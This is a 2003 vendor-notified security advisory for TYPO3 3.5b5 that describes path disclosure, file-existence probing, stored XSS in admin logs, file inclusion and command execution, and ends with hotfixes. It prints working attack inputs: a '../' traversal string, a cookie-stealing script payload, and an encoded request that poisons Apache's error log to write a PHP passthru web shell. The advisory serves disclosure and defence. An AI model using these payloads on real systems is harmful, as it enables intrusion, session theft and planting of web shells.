Typo3 3.5b5 Security Check Results

[28.02.03] Typo3 3.5b5 Security Check Results

 

=====================

Security REPORT TYPO3

=====================

 

 

Product: Typo3 (Version 3.5b5 / Earlier versions are possibly vulnerable too)

 

Vendor: Typo3 (http://www.typo3.com)

Vendor-Status: kasper@typo3.com informed / New Version availiable

Vendor-Patch: typo3.org/1331.0.html

 

Local: NO

Remote: YES

 

Vulnerabilities:

-path-disclosure

-proof of file-existense

-arbitrary file retrieval

-arbitrary command execution

-CrossSiteScripting / privilege escalation / cookie-theft

-install/config files and scripts within webroot

 

Severity: MEDIUM to HIGH

 

Tested Plattforms: Linux / Slackware i686 / Apache 1.3.23 / PHP 4.1.2

 

 

============

Introduction

============

 

Taken from www.typo3.com

 

TYPO3 is a free Open Source content management system for enterprise purposes

on the web and in intranets. It offers full flexibility and extendability while

featuring an accomplished set of ready-made interfaces, functions and modules.

 

 

=====================

Vulnerability Details

=====================

 

 

0) CLIENT-SIDE DATA-OBFUSCATION

 

form-fields are obfuscated using client-side java-script routines.

after the fields are joined a java-script creates MD5-hashes and

submits the form.

 

examples: index.php (account-data), showpic.php(name-checksum)

 

attached perl-scripts (typo.pl/showpic.pl) demonstrate how to circumvent

this protection.

 

 

1) PATH-DISCLOSURE

 

several test-, class- and library-scripts can be found within webroot.

some of them can be forced to produce runtime errors and output their

physical path.

 

example: /fileadmin/include_test.php

 

 

2) PROOF OF FILE-EXISTENZ

 

"showpic.php" and "thumbs.php" allow an attacker to check the existense of

arbitrary files.

 

combined with file-enumeration methods it is possible to reconstruct parts

of the directory- and filesystem - structure.

 

example on howto check for existing files with attached perl-script "showpic.pl":

---*---
sh> showpic.pl localhost '../../../../../../../../../../etc/hosts'
../../../../../../../../../../etc/hosts exists
---*---

 

 

3) CROSS SITE SCRIPTING / COOKIE-THEFT

 

all system and login-errors are saved in the typo3-database.

administrators can view all the erroneous data.

 

since this data is not being checked for XSS-content it is possible to include

client-side script(java-script)-tags in these entries.

 

every time the admins view their logs these scripts will be run on the admins

web-browser which leads to a typical XSS-bug.

 

thus making it possible to steal the admins-cookies or let him open a new

user-account wihout his knowledge.

 

example with the attached "typo.pl" - perlscript:

---*---
sh> typo.pl localhost '><script>alert(document.cookie)</script><:aaa'
---*---

 

viewing the logfiles will execute the script.

 

 

4) ARBITRARY FILE-RETRIEVAL

 

the "dev/translations.php" - script does not check the

ONLY-parameter for malicious values.

 

a relative path combined with a Nullbyte lead to the inclusion of the

given file.

 

example http-request:

---*---
GET host/dev/translations.php
---*---

 

 

5) ARBITRARY COMMAND EXECUTION

 

extends vulnerability number 4):

 

if the included file contains php-source code it will be executed.

thus allowing an attacker to execute operating-system commands and

at long sight escalate his privileges.

 

example:

---*---

 

a file for placing our malicious php-source is needed.

if there is no file we have write-access we still can use the websevers-logfiles.

 

the following http-request:

---cut---
localhost/<%3f %60echo %27<%3fpassthru(%5c%24c)%3f>%27 >> ./x.php%60 %3f>
---cut---

creates this entry:

---cut---
[Tue Jan 14 19:42:53 2003] [error] [client 127.0.0.1] File does not exist: /apachepath/apache/htdocs/' >> ./x.php` ?>
---cut---

 

in a typicall apache - error_log file.

 

using the method discussed under 4) the following http-request:

---cut---
localhost/typo3/typo3/dev/translations.php'
---cut---

 

will include the apach error_log in our output and execute our php-commands.

as a result we will find x.php in our "/dev" directory.

x.php:
---cut---

---cut---

---*---

 

 

6) SCRIPTS AND DIRECTORIES IN WEBROOT

 

a couple of scripts, libraries, files and directories can be found within typo3s

webroot.

 

"/install" is improper protected and vulnerable to brute-force attacks.

"/fileadmin" directory reveals log-files and demo-scripts

"/typo3conf" directory contains the localconf.php,database.sql and other sensitive files

 

 

=======

Remarks

=======

 

the serious vulnerabilities rely on the "/dev" (developer?) - directory.

scripts within this directory can be found in many/most production-environments!

 

 

====================

Recommended Hotfixes

====================

 

1) remove "/install" directory

2) remove "/dev" directory

2) Choose strong administrator-passwords

3) showpic.php and thumbs.php must be patched.

3) remove all demo-directories and protect "/fileadmin" and "/typo3conf"

 

 

 

EOF Martin Eiszner / @2002WebSec.org

 

 

=======

Contact

=======

 

SEC Consult Unternehmensberatung GmbH / Martin Eiszner

Blindengasse 3

1080 Vienna

 

Austria / EUROPE

 

m dot eiszner at sec-consult dot com

www.sec-consult.com